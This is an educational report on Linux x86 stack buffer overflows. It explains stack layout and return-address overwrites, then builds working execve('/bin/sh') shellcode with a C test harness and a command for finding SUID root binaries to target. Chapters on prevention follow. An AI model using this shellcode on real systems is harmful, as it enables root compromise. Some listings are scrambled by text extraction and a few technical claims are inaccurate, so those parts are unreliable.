Buffer Overflow Attack

Renjith Thomas

Buffer Overflow Attack by Renjith Thomas Copyright © 2003 by Renjith Thomas Revision History Revision 1.0 15 Oct 2003 Revised by: RT Buffer Overflow Attack

Table of Contents
Acknowledgement ............................................................................... i 1. Introduction ................................................................................... 1 Pre-requisites ..................................................................................... 1 Linux File System Permissions ........................................................... 1 Linux and the C programming language ............................................. 2 2. What’s a Buffer Overflow? .............................................................. 3 Memory layout ................................................................................... 3 Text Segment.............................................................................. 3 Data Segment ............................................................................. 3 Stack Segment............................................................................ 3 EIP register, CALL & RET instructions ................................................ 5 ESP, EBP ........................................................................................... 6 An Illustration.................................................................................... 7 A simple example ............................................................................... 8 3. The Attack ................................................................................... 11 Shell Code........................................................................................ 11 How to execute /bin/sh ?................................................................. 11 4. Creative stack smashing ............................................................... 17 SUID root programs by distribution.................................................. 17 5. Prevention and Security ............................................................... 19 Finding Buffer Overflows .................................................................. 19 Stack Smashing Prevention .............................................................. 19 Program modification................................................................ 19 Compiler modifications ............................................................. 21 CPU/OS kernel stack execution privilege .................................. 22 6. Conclusion ................................................................................... 25 A. References ................................................................................... 27



This document was prepared to give an overview about buffer overflows. I think I’m able to render some of it in this document. I’m indebtedly grateful to the Head Of The Computer Science Department Dr. Agnisarman Namboodirifor his support. I’m grateful to Prof. Zainul Abidfor his valuable guidance and suggestions. I’m also grateful to all other faculty members of Computer Science Department for their support. I gracefully remeber all students of S7 CSE-B.




Chapter 1. Introduction
By combining the C programming language’s liberal approach to memory handling with specific Linux filesystem permissions, this operating system can be manipulated to grant unrestricted privilege to unprivileged accounts or users. A variety of exploit that relies upon these two factors is commonly known as a buffer overflow, or stack smashing vulnerability. Stack smashing plays an important role in high profile computer security incidents. In order to secure modern Linux systems, it is necessary to understand why stack smashing occurs and what one can do to prevent it.

To understand what goes on, some C and assembly knowledge is required. Virtual Memory, some Operating Systems essentials, like, for example, how a process is laid out in memory will be helpful. You MUST know what a setuid binary is, and of course you need to be able to -at least- use Linux systems. If you have an experince of gdb/cc, that is something really good. Document is Linux/ix86 specific. The details differ depending on the Operating System or architecture you’re using. Here, I have tried out some small buffer overflows that can be easily grasped. The pre-requisites described above are explained is some detail below.

Linux File System Permissions
In order to better understand stack smashing vulnerabilities, it is first necessary to understand certain features of filesystem permissions in the Linux operating system. Privileges in the Linux operating system are invested solely in the user root, sometimes called the superuser, root’s infallibility is expected under every condition including program execution. The superuser is the main security weakness in the Linux operating system. Because the superuser can do anything, after a person gains superuser privileges for example, by learning the root password and logging in as root that person can do virtually anything to the system. This explains why most attackers who break into Linux systems try to become superusers. Each program (process) started by the root user inherits the root user’s allinclusive privilege. In most cases the inherited privilege is subsequently passed to other programs spawned by root’s running processes. Set UID (SUID) permissions in the Linux operating system grant a user privilege to run programs or shell scripts as another user. Linux operating system, the process in memory that handles the program execution is usually owned by the user who executed the program. Using a unique permission bit to indicate SUID, the filesystem indicates to the operating system that the program will run under the file owner’s ID rather than the user’s ID who executed the program. Often times SUID programs are owned by root; while these programs may be executable by an underprivileged user on the system, they run in memory with unrestricted access to the system. As one can see, SUID root permissions are used to grant an unprivileged user temporary, and necessary, use of privileged resources. Many Linux programs need to run with superuser privileges. These programs are run as SUID root programs, when the system boots, or as network servers. A single bug in any of these complicated programs can compromise the safety of your entire system. This characteristic is probably a design flaw, but it is basic to the design of Linux, and it not likely to change. Exploitation of this “feature turned design flaw” is critical in constructing buffer overflow exploits. 1

Chapter 1. Introduction

Linux and the C programming language
The Linux operating system is inextricably linked to the C programming language. All modern implementations of the Linux operating system are written in the C programming language, including system binaries and the kernel. What C gains in simplicity and efficiency, it sacrifices in terms of data integrity and ease of use. The standard C library in most Linux implementations is vulnerable to buffer overflows and memory leaks. Not to be interpreted as errors in the design of the language, C assumes the programmer is responsible for data integrity. Once a variable is allocated memory space in C, the language does nothing to insure that the expected contents of the variable fit into the allocated memory. C programmers often use the term buffer and array interchangeably thus, it is safe to define a buffer as a contiguous block of memory (core) that holds multiple instances of an identical data type. As with all variables in C, buffers are declared dynamic or static. Static buffers which are explicitly defined in the source code and are allocated at load time on the data segment in memory. Dynamic arrays are defined via pointers to memory locations in source code and are allocated at run time on the stack. Due to the obvious limitations on static arrays, dynamic allocation is the method used in all major programs and applications in the Linux environment. Thus, Smashing the stack or stack overflow exploits are concerned only with programs that do dynamic allocation.


Chapter 2. What’s a Buffer Overflow?
Memory layout
If you know C, you - most probably - know what a character array is. Assuming that you code in C, you should already know the basic properties of arrays, like: arrays hold objects of similar type, e.g. int, char, float. Just like all other data structures, they can be classified as either being "static" or being "dynamic". Static variables are loaded to the data segment part of the program, whereas dynamic variables are allocated and deallocated within the stack region of the executable in the memory. And, "stack-based" buffer overflows occur here, we stuff more data than a data structure, say an array, can hold, we exceed the boundaries of the array overriding many important data. Simply, it is copying 20 bytes to an array that can handle only 12 bytes... Memory layout for a Linux ELF binary is quite complex. It has become even more complex, especially after ELF ("Executable and Linkable Format") and shared libraries are introduced. However, basically, every process starts running with 3 segments:

Text Segment
Text Segment, is a read-only part that includes all the program instructions. For such assembly instructions that are the equivalent of the below C code will be included in this segment:
for (i = 0; i < 10; i++) s += i;

Data Segment
Data Segment is the block where initialized and uninitialized (which is also known as BSS) data is. For example,if you code:
int i;

the variable is an uninitialized variable, and it’ll be stored in the "uninitialized variables" part of the Data Segment. (BSS) and, if you code;
int j = 5;

the variable is an initialized variable, and the the space for the j variable will be allocated in the "initialized variables" part of the Data Segment.

Stack Segment
A segment, which is called "Stack", where dynamic variables (or in C jargon, automatic variables) are allocated and deallocated; and here return addresses for functions are stored temporarily. For example, in the following code snippet, i variable is created in the stack, just after the function returns, it is destroyed:
int myfunc(void) { int i; for (i = 0; i < 10; i++)


Chapter 2. What’s a Buffer Overflow?
putchar("*"); putchar(’\n’); }

If we are to symbolize the stack:
0xBFFFFFFF --------------------| | | . | | . | | . | | . | | etc | | env/argv pointer. | | argc | |-------------------| | | | stack | | | | | | | | | | V | / / \ \ | | | ^ | | | | | | | | | | heap | |-------------------| | bss | |-------------------| | initialized data | |-------------------| | text | |-------------------| | shared libraries | | etc. | 0x8000000 |-------------------| _* STACK *_

Stack is in basic terms a data structure, which all of you will remember from your Data Structures courses. It has the same basic operation. It’s a LIFO (Last-In, First Out) data data structure. Its processes are controlled directly by the CPU via some special instructions like PUSH and POP. You PUSH some data to the Stack, and POP some other data. Whoever comes in LAST, he’s the one who will go out FIRST. So, in technical terms, the first that will be popped from the stack is the one that is pushed last. SP (Stack Pointer) register on the CPU contains the address of data that will be popped from the stack. Whether SP points to the last data or the one after the last data on the stack is CPU-specific; however, ix86 architecture, which is our subject, SP points to the address of the last data on the Stack. In ix86 protected mode (32 bit/double word),PUSH and POP instructions are done in 4-byte-units. Another important detail to be noted here is that Stack grows downward, that is, if SP is 0xFF, just after PUSH EAX instruction, SP will become 0xFC and the value of EAX will be placed on 0xFC address. 4

Chapter 2. What’s a Buffer Overflow? PUSH instruction will subtract 4 bytes from ESP (remember the above paragraph), and will push a double word to the stack, placing the double wordin the address pointed by the ESP register. POP instruction, on the other hand, reads the address in the ESP register, POPs the value pointed by that address from the Stack, and adds 4 to ESP (adds 4 to the address in the ESP register). Assuming that ESP is initially 0x1000, let’s examine the following assembly code:
PUSH dword1 ;value at dword1:1, ESP’s value: 0xFFC (0x1000-4) PUSH dword2 ;value at dword2: 2, ESP’s value: 0xFF8 (0xFFC-4) PUSH dword3 ;value at dword3: 3, ESP’s value: 0xFF4 (0xFF8-4) POP EAX ;EAX’ value 3, ESP’s value: 0xFF8 (0xFF4+4) POP EBX ;EBX’s value 2, ESP’s value: 0xFFC (0xFF8+4) POP ECX ;ECX’s value 1, ESP’s value: 0x1000 (0xFFC+4)

Stack, while being used as a temporay storage for dynamic variables, it’s being used to store the return addresses for some fuction calls storing temporary variables and for passing parameters to fuctions. And, of course, this is where evil things come into ground.

EIP register, CALL & RET instructions
CPU, in each machine cycle, looks at what’s stored in the Instruction Pointer register (In ix86 32-bit protected mode this is EIP - Extended Instruction Pointer) to know what to execute next. In the EIP register, the address of the instruction that will be executed next is stored. Usually, the addresses are sequential, meaning the next instruction that’ll be executed next is, a few bytes ahead of the current instruction in the memory. The CPU calculates that "a few bytes" according to how many bytes long the current instruction is; and adds that "a few bytes" value to the address of the present address. To examplify, assume that the present instruction’s address is 0x8048438. This is the value that’s written in EIP. So, CPU is executing the instruction that’s found in memory location: 0x8048438. Say, it’s a PUSH instruction:
push %ebp

CPU knows that a PUSH instruction is 1 byte long, so the next instruction will be at 0x8048439, which may be
mov %esp,%ebp

While executing the PUSH, CPU will put the address of MOV in EIP. Okay, we said that the values that’ll be put in EIP are calculated by the CPU itself. What if we JMP to a function? The addresses of the instructions in the function will be somewhere else in the memory. After they are executed, how can the CPU know where to go on with the calling procedure and execute. For this, just before we JMP to the function, we save the address of the next instruction in a temporary register, say in EDX; and before returning from the function we write the address in EDX to EIP back again. If we use JMP to jump to the addresses of functions, that would be a very tiresome work actually. 5

Chapter 2. What’s a Buffer Overflow? However, ix86 processor family provides us with two instructions: CALL and RET, making our lives easy! the CALL instruction writes that "next instruction to be executed after function returns" (from then on, we’ll call this as the "return address") to the stack. It PUSHes it onto the stack, and writes the address of the function to EIP. Thus, a function call is made. The RET instruction, on the other hand, POPs the "return address" from the stack, and writes that address in the EIP. Thus we’ll safely return from the function, and continue with the program’s next thread of execution. Let’s have a look at the following code snippet:
x = 0; function(1, 2, 3); x = 1;

After several assembly instructions has been run for (x = 0), we need to go the memory location where function() is located. As we said earlier, for this to happen, first we copy the address of the return address, (the address of x = 1 instructions in this case.) to some temporary space (might be a register) jump to the address space of function with JMP, and, in the end of the function we restore the return address that we’d copied to the EIP. All these dirty operations are done on behalf of us via CALL and RET by the CPU itself, and you can get the details from the above paragraph. Generally, the Stack region of the program can be symbolized like:
|_parameter_I____| ESP+8 |_parameter II___| ESP+4 |_return address_| ESP

The stack, as we’ve said, is also used to store dynamic variables. Dynamically, the CPU PUSHes some data, as the program requests new space, and POPs other data, when our program releases some data. To address the memory locations, we use "relative addressing". That means, we address the locations of data in our stack in relative to some criterion. And this criterion is ESP, which is the acronym for Extended Stack Pointer. This register points to the top of the stack. Consider this:
void f() { int a; }

As you can see, in the f() function, we allocate space for an integer variable named a . The space for the integer variable a will be allocated in the stack. And, the computer will referece its address as ESP - some bytes. So the stack pointer is quite crucial for the program execution. What if we call a function? The calling function has a stack, it has some local variables, meaning it should utilize the stack pointer register. Also, the function that is called from whithin will have local variables and it’ll need that stack pointer. To overcome this, we save the old stack pointer. We, just like we did for the return address, PUSH the old ESP to the stack, and utilize another register, named EBP to relatively reference local variables in the callee function. 6

Chapter 2. What’s a Buffer Overflow? And, this is the symbolization of the Stack, if ESP is also PUSHed onto the stack:
|_parametre_I___| |_parametre II__| |_return adress_| |___saved_ESP___| |_local var I __| |_local var II__| EBP+12 EBP+8 EBP+4 EBP EBP-4 EBP-8


In the above picture, parameter I and II are the arguments passed to the function. After the return address and saved ESP, local var I and II are the local variables of the function. Now, if we sum up all we said, while calling a function:
• • •

1. We save the old stack pointer, PUSHing it onto the stack 2. We save the address of the next instruction (return address), PUSHing it onto the stack. 3. And we start executing the instructions of the function.

These 3 steps are all done when we CALL a subroutine, say a function.

An Illustration
Let’s see the operation of the stack, and procedure prologue in a live example:
void fun(int a, int b, int c) { char z[4]; } void main() { fun(1, 2, 3); }

compile this with the -g flag to enable debugging: $ gcc -g a.c -o a Let’s see the what’s happened there: $ gdb -q ./a (gdb) disassemble main Dump of assembler code for function main:
0x8048448 <main>: 0x8048449 <main+1>: 0x804844b <main+3>: 0x804844d <main+5>: 0x804844f <main+7>: 0x8048451 <main+9>: 0x8048456 <main+14>: 0x8048459 <main+17>: 0x804845a <main+18>: End of assembler dump. (gdb) pushl movl pushl pushl pushl call addl leave ret %ebp %esp,%ebp $0x3 $0x2 $0x1 0x8048440 <fun> $0xc,%esp

As you can see above, in main() the first instruction is:
0x8048448 <main>: pushl %ebp

which backs up the old stack pointer. It pushes it onto the stack. 7

Chapter 2. What’s a Buffer Overflow? Then, copy the old stack pointer to the ebp register:
0x8048449 <main+1>: movl %esp,%ebp

Thus, from then on, in the function, we’ll reference function’s local variables with EBP. These two instructions are called the "Procedure Prologue". Then, we PUSH the function fun()’s arguments onto the stack in reverse order:
0x804844b <main+3>: 0x804844d <main+5>: 0x804844f <main+7>: pushl pushl pushl $0x3 $0x2 $0x1

We call the function:
0x8048451 <main+9>: call 0x8048440 <fun>

As I’ve explained by CALL’ing we PUSHed the address of instruction addl $0xc,%esp’s address 0x8048456 onto the stack. After the function RETurned, we add 12 or 0xc in hex (since we pushed 3 args onto the stack, each allocating 4 bytes (integers)). Then we leave the main() function, and return:
0x8048459 <main+17>: 0x804845a <main+18>: leave ret

Ok, what happened inside the function fun() ?:
(gdb) disassemble fun Dump of assembler code for function fun: 0x8048440 <fun>: pushl %ebp 0x8048441 <fun+1>: movl %esp,%ebp 0x8048443 <fun+3>: subl $0x4,%esp 0x8048446 <fun+6>: leave 0x8048447 <fun+7>: ret End of assembler dump. (gdb)

The first two instructions are just the same. They are procedure prologue. Then we see a :
0x8048443 <fun+3>: subl $0x4,%esp

which subtracts 4 bytes from ESP. This is to allocate space for the local z variable. We declared it as char z[4] remember? It is a 4-byte character array. End, at the end, the function returns:
0x8048446 <fun+6>: 0x8048447 <fun+7>: leave ret


Chapter 2. What’s a Buffer Overflow?

A simple example
#include <string.h> void fun(char *str) { char foo[16]; strcpy(foo, str); } void main() { char large_one[256]; memset(large_one, ’A’, 255); fun(large_one); }

$ cc -W -Wall -pedantic -g c.c $ ./c Segmentation fault (core dumped)

-o c

What we do above is simply writing 255 bytes to an array that can hold only 16 bytes. We passed a large array of 256 bytes as a parameter to the fun() function. Within the function, without bounds checking we copied the whole large_one to the foo, overflowing all the way foo and some other data. Thus buffer is filled, also strcpy() filled other portions of memory, including the return address, with A. Here is the inspection of generated core file with gdb:
$ gdb -q c core Core was generated by ‘./c’. Program terminated with signal 11, Segmentation fault. find_solib: Can’t read pathname for load map: Input/output error #0 0x41414141 in ?? () (gdb)

As you can see, CPU saw 0x41414141 (0x41 is the hex ASCII code for letter A) in EIP, tried to access and execute the instruction located there. However, 0x41414141 was not memory address that our program was allowed to access. In the end, OS send a SIGSEGV (Segmentation Violation) signal to the program and stopped any further execution. When we called f(), the stack looked like this:
|______*str______| |_return address_| |___saved_ESP____| |______foo1______| |______foo1______| |______foo1______| |______foo1______| EBP+8 EBP+4 EBP EBP-4 EBP-8 EBP-12 EBP-16


strcpy() copied large_one to foo, without bounds checking, filling the whole stack with A, starting from the beginning of foo1, EBP-16. Now that we could overwrite the return address, if we put the address of some other memory segment, can we execute the instructions there? The answer is yes. 9

Chapter 2. What’s a Buffer Overflow? Assume that we place some /bin/sh spawning instructions on some memory address, and we put that address on the function’s return address that we overflow, we can spawn a shell, and most probably, we will spawn a root shell, since you’ll be already interested with setuid binaries.


Chapter 3. The Attack
Shell Code
As shown in the previous section, by manipulating dynamically allocated variables with unbounded byte copy operations, execution of arbitrary code is possible via the return address blindly ‘restored’ following a function exit. The ability to execute arbitrary code instructions as the superuser is often used with calls that will allow an attacker to continue executing indefinite commands as root. To obtain maximum root system privilege, the interactive bourne shell program is spawned, /bin/sh. The bourne shell is a shell that exists on every modern UNIX system, and is commonly the default system shell for the privileged user. Any system shell can be used as shell code, however, in the interest of keeping this study as generic as possible, /bin/sh is assumed. In order to arrange an interactive shell situation, a static /bin/sh execution sequence must appear somewhere in memory so that a manipulated ‘return address’ can point to that location. This is accomplished by using an assembly language hexadecimal string of the binary equivalent to the standard C function call: execve(name[0], "/bin/sh", NULL). Assembly language equivalents to this call are hardware implementation dependent . Using debugging utilities, it is possible to dissect a call such as execve(name[0], "/bin/sh", NULL) by breaking it down to a simple ASCII assembly sequence, and storing it in a character array or other contiguous data structure. On an Intel x86 machine running Linux, the following is a list of steps used in formulating shell:
• • • • • • • • • •

1. The null terminated string /bin/sh exists somewhere in memory. 2. The address of the string /bin/sh exists somewhere in memory followed by a null long word. 3. 0xb is copied into the EAX register. 4. The address of the string /bin/sh is copied into the EBX register. 5. The address of the string /bin/sh is copied into the ECX register. 6. The address of the null long word is copied into the EDX register. 7. The int $0x80 instruction is executed, a standard Intel CPU interrupt 8. 0x1 is copied into the EAX register. 9. 0x0 is copied into the EBX register. 10. The int $0x80 instruction is executed, a standard Intel CPU interrupt.

This listing can be reduced to x86 actual shell code in a standard ANSI C character array.

How to execute /bin/sh ?
In C, the code to spawn a shell would be like this:
#include <unistd.h> void main() { char *shell[2]; shell[0] = "/bin/sh"; shell[1] = NULL;


Chapter 3. The Attack

execve(shell[0], shell, NULL); }

$ cc -W -Wall -pedantic -g $ ./shell bash$


-o shell

If you look at the man page of execve , you’ll see that execve expects a pointer to the filename that’ll be executed, a NULL terminated array of arguments, and an environment pointer, which can be NULL. If you compile and run the output binary, you’ll see that you spawn a new shell. So far so good... But we cannot spawn a shell in this way, right? How can we send this code to the vulnerable program this way? We can’t! This poses us a new question: How can we pass our evil code to the vulnerable program? We will need to pass our code, which will possibly be a shell code, in the vulnerable buffer. For this to happen, we have to be able to represent our shell code in a string. Thus we’ll list all the assembly instructions to spawn a shell, get their opcodes, list them one by one, and assemble them as a shell spawning string. First, let’s see how the above code will be in assembly. Let’s compile the program as static (this way, also execve system call will be disassmbled) and see:
$ gcc -static -g -o shell shell.c $ objdump -d shell | grep \<__execve\>: -A 12 0804ca10 <__execve>: 804ca10: 53 pushl %ebx 804ca11: 8b 54 24 10 movl 0x10(%esp,1),%edx 804ca15: 8b 4c 24 0c movl 0xc(%esp,1),%ecx 804ca19: 8b 5c 24 08 movl 0x8(%esp,1),%ebx 804ca1d: b8 0b 00 00 00 movl $0xb,%eax 804ca22: cd 80 int $0x80 804ca24: 5b popl %ebx 804ca25: 3d 01 f0 ff ff cmpl $0xfffff001,%eax 804ca2a: 0f 83 00 02 00 jae 804cc30 <__syscall_error> 804ca2f: 00 804ca30: c3 ret 804ca31: 90 nop

Let’s analyze the syscall step by step: Remember, in our main() function, we coded:
execve(shell[0], shell, NULL)

We passed: the address of string "/bin/sh", the address of NULL terminated array, NULL (in fact it is env address). Here in the main:
$ objdump -d shell 08048124 <main>: 8048124: 55 8048125: 89 8048127: 83 804812a: c7 804812f: 05 8048131: c7 | grep \<main\>: pushl movl subl movl movl -A 17 %ebp %esp,%ebp $0x8,%esp $0x80592ac,0xfffffff8(%ebp) $0x0,0xfffffffc(%ebp)

e5 ec 08 45 f8 ac 92 08 45 fc 00 00


Chapter 3. The Attack
8048136: 8048138: 804813a: 804813d: 804813e: 8048141: 8048142: 8048147: 804814a: 804814b: 804814c: 00 6a 8d 50 8b 50 e8 83 c9 c3 90 00 00 45 f8 45 f8 c9 48 00 00 c4 0c

pushl leal pushl movl pushl call addl leave ret nop

$0x0 0xfffffff8(%ebp),%eax %eax 0xfffffff8(%ebp),%eax %eax 804ca10 <__execve> $0xc,%esp

before the call execve (call 804ca10 <__execve>), we pushed the arguments onto the stack in reverse order. So, if we turn back to __execve: We copy the NULL byte to the EDX register, we copy the addresss of the NULL terminated array into ECX register, we copy the address of string "/bin/sh" into the EBX register, we copy the syscall index for execve, which is 11 (0xb) to EAX register.Then change into kernel mode. All what we need is this much. However, there are problems here. We cannot exactly know the addresses of the NULL terminated array’s and string "/bin/sh"’s addresses. So, how about this?:
xorl %eax, %eax pushl %eax pushl $0x68732f2f pushl $0x6e69622f movl %esp,%ebx pushl %eax pushl %ebx movl %esp,%ecx cdql movb $0x0b,%al int $0x80

Let’s try to explain the above instructions: If you xor something with itself, you get 0, equivelant of NULL. Here, we get a NULL in EAX register.Then we push the NULL onto stack. We push string "//sh" onto the stack,
2f 2f 73 68 is is is is / / s h pushl


We push string "/bin" onto the stack:
2f is 62 is 69 is 6e is pushl / b i n $0x6e69622f

As you can guess, now the stack pointer’s address is just like the address of our NULL terminated string "/bin/sh"’s address. Because, starting from the stack pointer which points to the top of the stack, we have a NULL terminated character array. So, we copy the stack pointer to EBX register. See, we have already placed "/bin/sh"’s address into EBX register :
movl %esp,%ebx


Chapter 3. The Attack

Then we need to set ECX with the NULL terminated array’s address. To do this, We create a NULL-terminated array in our stack, very similar to the above one: First we PUSH a NULL. we can’t do PUSH NULL, but we can PUSH something which is NULL, remember that we xor’d EAX register and we have NULL there, so let’s PUSH EAX to get a NULL in the stack:
pushl %eax

Then we PUSH the address of our string onto stack, this is the equivelant of shell[0]:
pushl %ebx

Now that we have a NULL terminated array of pointers, we can save its address in ECX:
movl %esp,%ecx

What else do we need? A NULL in EDX register. we can movl %eax, %edx, but we can do this operation with a shorter instruction: cdq. This instruction sign-extends what’s in EAX to EDX. :

We set EAX 0xb which is the syscall id of execve in system calls table.
movb $0x0b,%al

Then, we change into kernel mode:
int 0x80

After, we go into kernel mode, the kernel will exec what we instructed it: /bin/sh and we will enter an interactive shell... So, after this much philosophy, all what we need is to convert these asm instructions into a string. So, let’s get the hexadecimal opcodes and assemble our evil code. Here we put our evil code in the chracter array sc[]. Let’s test our shell code:
char sc[]= "\x31\xc0" "\x50" "\x68""//sh" "\x68""/bin" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x99" "\xb0\x0b" "\xcd\x80" ; main() { int *ret; ret = (int *)&ret + 2; *ret = sc; } /* 24 /* /* /* /* /* /* /* /* /* /* /* bytes xorl pushl pushl pushl movl pushl pushl movl cdql movb int */ %eax,%eax %eax $0x68732f2f $0x6e69622f %esp,%ebx %eax %ebx %esp,%ecx $0x0b,%al $0x80 */ */ */ */ */ */ */ */ */ */ */


Chapter 3. The Attack

$ gcc -g -o shellcode shellcode.c $ ./shellcode bash$

Hmm, it works. What we’ve done above is, increasing the address of ret (which is a pointer to integer) 2 double words (8 bytes), thus reaching the memory location where the main()’s return address is stored. And then, because ret’s relative address is now RET, we stored the address of string sc’s address (which is our evil code) into ret. In fact, we changed the return address’ value there. The return address then pointed to sc[]. When main() issued RET, the sc’s address has been written to EIP, and consequently, the CPU started executing the instructions there, resulting in the execution of /bin/sh.


Chapter 3. The Attack


Chapter 4. Creative stack smashing
SUID root programs included in Linux distributions are not precompiled with “shell code” as part of the binary. To exploit these type of programs, some means must be used to insert the shellcode array into the runtime environment. Stack smashers have devised creative ways to accomplish this. In order to inject the shell code into the runtime process, stack smashers have manipulated command line arguments, shell environment variables, and interactive input functions with the necessary shell code sequence. Not only do most stack smashing exploits rely upon shell code to accomplish their task, but these type of exploits depend on knowing at what address in memory this shell code will reside. Taking this into consideration, many stack smashers have padded their shell code with NULL (or noop) assembly operations this gives the shell code a ‘wider space’ in memory and makes it easier to guess where the shell code may be when manipulating the return address. This approach, combined with an approach whereby the shell code is followed by many instances of the ‘guessed’ return address in memory; is a common strategy used in constructing stack smashing exploits. An additional approach, when small programs with memory restrictions are exploited, is to store the shellcode in an environment variable.

SUID root programs by distribution
In order to search standard Linux distributions for SUID root programs, the following command can be executed by the privileged user: /usr/bin/find /
user root perm 004000 print

This command is a systemwide search command for SUID root files; which, as described, are crucial in constructing stack smashing exploits. On a Linux machine running the 2.0.30 kernel, built from a modified version of the Slackware distribution, 56 SUID root worldexecutable binaries existed on the system. A subtle byte copying error in any one of the above programs could allow for a stack smashing vulnerability. Comparatively, in a distribution of the Solaris operating system, approximately 67 SUID root worldexecutable programs on the system in total 12. As with the Linux distribution, an error in the coding to handle dynamic string variables in any one of these system binaries could allow for a stack smashing vulnerability. Using Linux and Solaris as examples, one may conclude that a significant number of SUID root binaries exist in the typical Linux distribution. Any one of these programs can become a target for stack smashers, thus, prevention and protection of these files is a necessity.


Chapter 4. Creative stack smashing


Chapter 5. Prevention and Security
Finding Buffer Overflows
As stated earlier, buffer overflows are the result of stuffing more information into a buffer than it is meant to hold. Since C does not have any built-in bounds checking, overflows often manifest themselves as writing past the end of a character array. The standard C library provides a number of functions for copying or appending strings, that perform no boundary checking. They include: strcat(), strcpy(), sprintf(), and vsprintf(). These functions operate on null-terminated strings, and do not check for overflow of the receiving string. gets() is a function that reads a line from stdin into a buffer until either a terminating newline or EOF. It performs no checks for buffer overflows. The scanf() family of functions can also be a problem if you are matching a sequence of non-white-space characters (%s), or matching a non-empty sequence of characters from a specified set (%[]), and the array pointed to by the char pointer, is not large enough to accept the whole sequence of characters, and you have not defined the optional maximum field width. If the target of any of these functions is a buffer of static size, and its other argument was somehow derived from user input there is a good posibility that you might be able to exploit a buffer overflow. Another usual programming construct we find is the use of a while loop to read one character at a time into a buffer from stdin or some file until the end of line, end of file, or some other delimiter is reached. This type of construct usually uses one of these functions: getc(), fgetc(), or getchar(). If there is no explicit checks for overflows in the while loop, such programs are easily exploited. To conclude, grep() is your friend. The sources for free operating systems and their utilities is readily available. This fact becomes quite interesting once you realize that many comercial operating systems utilities where derived from the same sources as the free ones.

Stack Smashing Prevention
A centralized or decentralized approach can be taken to avoid stack smashing security vulnerabilities. To do so, changes must be implemented in the privileged programs themselves, in the C programming language compilers, or in the operating system kernel. A centralized approach involves modification of system libraries and/or an operating system kernel while a decentralized approach involves the modification of privileged programs and/or C programming language compilers. Of these two basic approaches, a decentralized approach is more immediately expensive with respect to manpower and workload, but cheaper in the long term providing a stable, long lasting solution. A centralized approach is cheaper in the short term, with respect to manpower and workload, but is near impossible to implement as a long term solution.

Program modification
To effectively fix defective SUID root program, a number of modifications can be made to the program’s source code to avoid stack smashing vulnerabilities. Standard C byte copy or concatenation functions often are crucial in most buffer overflow exploits. A list of vulnerable function calls in the C programming language, and suitable replacement function (if available) is as follows:
function suitable replacement


Chapter 5. Prevention and Security

gets() sprintf() strcat() strcpy() streadd() strecpy() strtrns() index() fscanf() scanf() sscanf() vsprintf() realpath() getopt() getpass()

fgets() strncat() strncpy()

In general, functions that return a pointer to a result in static storage can be used in stack smashing exploits. In other terms, standard C function calls that copy strings without checking their length are insecure. Some vulnerable functions have suitable ‘drop in’ replacements, others do not. Whenever possible, alternative functions must be used to help insure that privileged code is not susceptible to stack smashing exploits. In addition to using suitable replacements for vulnerable functions, shell environment pointers and excessive command line arguments also need to be checked for invalid data. Recall that stack smashers are creative and often hide shell code and other crucial exploit information in excessive command line arguments or environment variables. Thus, securing source code must be a comprehensive process to be effective, and all avenues of unauthorized input must be inspected and properly terminated if invalid. Commercial programs such as CenterLine software’s Code Center or Pure Atria’s Purify, and noncommercial programs such as Brian Marick’s GCT or Bruce Peren’s ElectricFence can be used to assist programmers in locating buffer overflows and illegal function operations that standard C compilers do not look for. However, programs such as these can only catch overflow bugs reactively, not proactively; A test case must exist which provokes the stack smashing hole. Furthermore, many of these programs can offer more information than standard Linux facilities while investigating a program’s abnormal memory operations. As C debugging tools, these programs may offer more than simple ‘segmentation violation’ messages. However, it is important to remember that these programs are designed to remove bugs and do not specialize in security. Furthermore, these programs do not consider the current or future filesystem permissions of the program. The same battery of tests are submitted to a program whether it runs as a privileged user or not. In summary, automated debugging tools are useful in correcting known vulnerabilities, however, they cannot detect future vulnerabilities and are limited as security tools. Security and stability are synonymous. Programs that use secure functions and accept less bad input data are not only more secure, but run more efficiently and build faster. By changing existing code and writing new code with security in mind, both privileged code and nonprivileged code share the benefits. Recalling the ease in which privileged program execution can be transferred, it is important to note that privileged code often trusts non privileged code. Privileged processes may assume that all binaries, privileged and non privileged, are to be trusted. By using more secure programming practices on all Linux system code, every segment of the code base is strengthened. Security and robustness both 20

Chapter 5. Prevention and Security involve thinking about the ranges of allowable inputs and responses, and limiting them so undesirable responses are not produced. Modifying the code is the only near foolproof method of insuring that SUID root programs are not exploited. Not only can this avoid buffer overflows in programs, but it will build faster, more efficient, robust code with respect to nonsecurity areas of the operating system. The OpenBSD project has paid special attention to this. The disadvantages of manually modifying all affected programs is obvious since all subject programs must be checked by hand and recompiled. Thousands of lines of source code must have all function calls and UID execution privileges examined and changed, if necessary. In the free operating system arena, systems such as Linux, FreeBSD, OpenBSD and NetBSD have full source code distributions available for public use. Complete copies of the operating system kernel and system utilities may be downloaded and modified, allowing anyone to fix stack smashing vulnerabilities. However, In contrast to this approach, commercial Linux operating systems have limited, if any source code availability. As the chief decentralized approach in avoiding stack smashing holes in the Linux operating system, global code auditing is the most expensive in terms of necessary manpower and workload but can offer the most in long term reliability and security.

Compiler modifications
An additional decentralized approach to preventing stack smashing vulnerabilities is to modify the C language compiler’s performance in a given Linux operating system concerning vulnerable functions. However, it is important to note that, in most cases, these modifications to the C programming language are not trivial and involve fundamental modifications to the concepts behind the C programming language. A simple approach of this nature involves modifications to the C compiler, which do not affect the C programming language. For example, the BSDI and OpenBSD operating systems’ compilers generate warning messages when compiling a program which uses “dangerous” function calls. Despite this shortcoming, the main benefit of using an approach such as this is that it encourages secure programming without changing the code or its performance. A median approach of this nature involves slight modifications to the compiler, such as those would modify only the “dangerous” functions in the C library and perform a stack integrity check before referencing the appropriate return value. In his proposed patch to the FreeBSD operating system, if the integrity check fails, it would simply print a warning message and exit the affected program. The main disadvantage to this approach is that all dangerous functions would suffer a significant performance penalty, and like the previous approach, this modification does not take into account autonomous functions defined by the programmer, because of its implementation in the system libraries. An additional drawback to this approach is that the code necessary in checking the stack must be written in assembler, and is thus not portable to multiple architectures. An extreme approach to solving the problem with the compiler involves implementing bounds checking in the C programming language. Possibly the most dangerous solution to the stack smashing problem, as this approach violates C programming language’s simplicity, efficiency, and flexibility devices. One approach used in implementing this involves modifying the representation of pointers in the language to include three items: the pointer itself, and the lower and upper bounds of the pointer’s address space. 21

